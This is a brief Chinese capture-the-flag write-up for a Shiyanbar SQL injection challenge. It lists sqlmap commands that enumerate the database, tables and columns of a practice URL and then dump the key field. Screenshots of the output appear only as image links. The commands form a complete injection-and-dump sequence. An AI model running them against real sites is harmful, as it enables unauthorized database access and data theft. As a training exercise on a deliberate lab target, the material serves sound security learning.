题目:这个看起来有点简单! 分值:10
URL:http://www.shiyanbar.com/ctf/33
解题步骤:
sqlmap扫描目标 --current-db 拿目标的库名
sqlmap -u"http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db
data:image/s3,"s3://crabby-images/24cb2/24cb2acceefebd15a5a39845656677980c7b377e" alt=""
-D 库名 --tables 库内表名
sqlmap -u"http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
data:image/s3,"s3://crabby-images/0be84/0be8487fa20b07a8550682272c9f2076e109349f" alt=""
-T 表名 --columns 猜列名
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1"-D my_db -T thiskey --columns
data:image/s3,"s3://crabby-images/71f42/71f420add11d487c98ae7048eaf508323740d5dd" alt=""
-C 列名 --dump 字段值
sqlmap -u"http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -Ck0y --dump
data:image/s3,"s3://crabby-images/907ac/907acbf835a8a9628fe1656ff6e8ca3a13e76004" alt=""
网友评论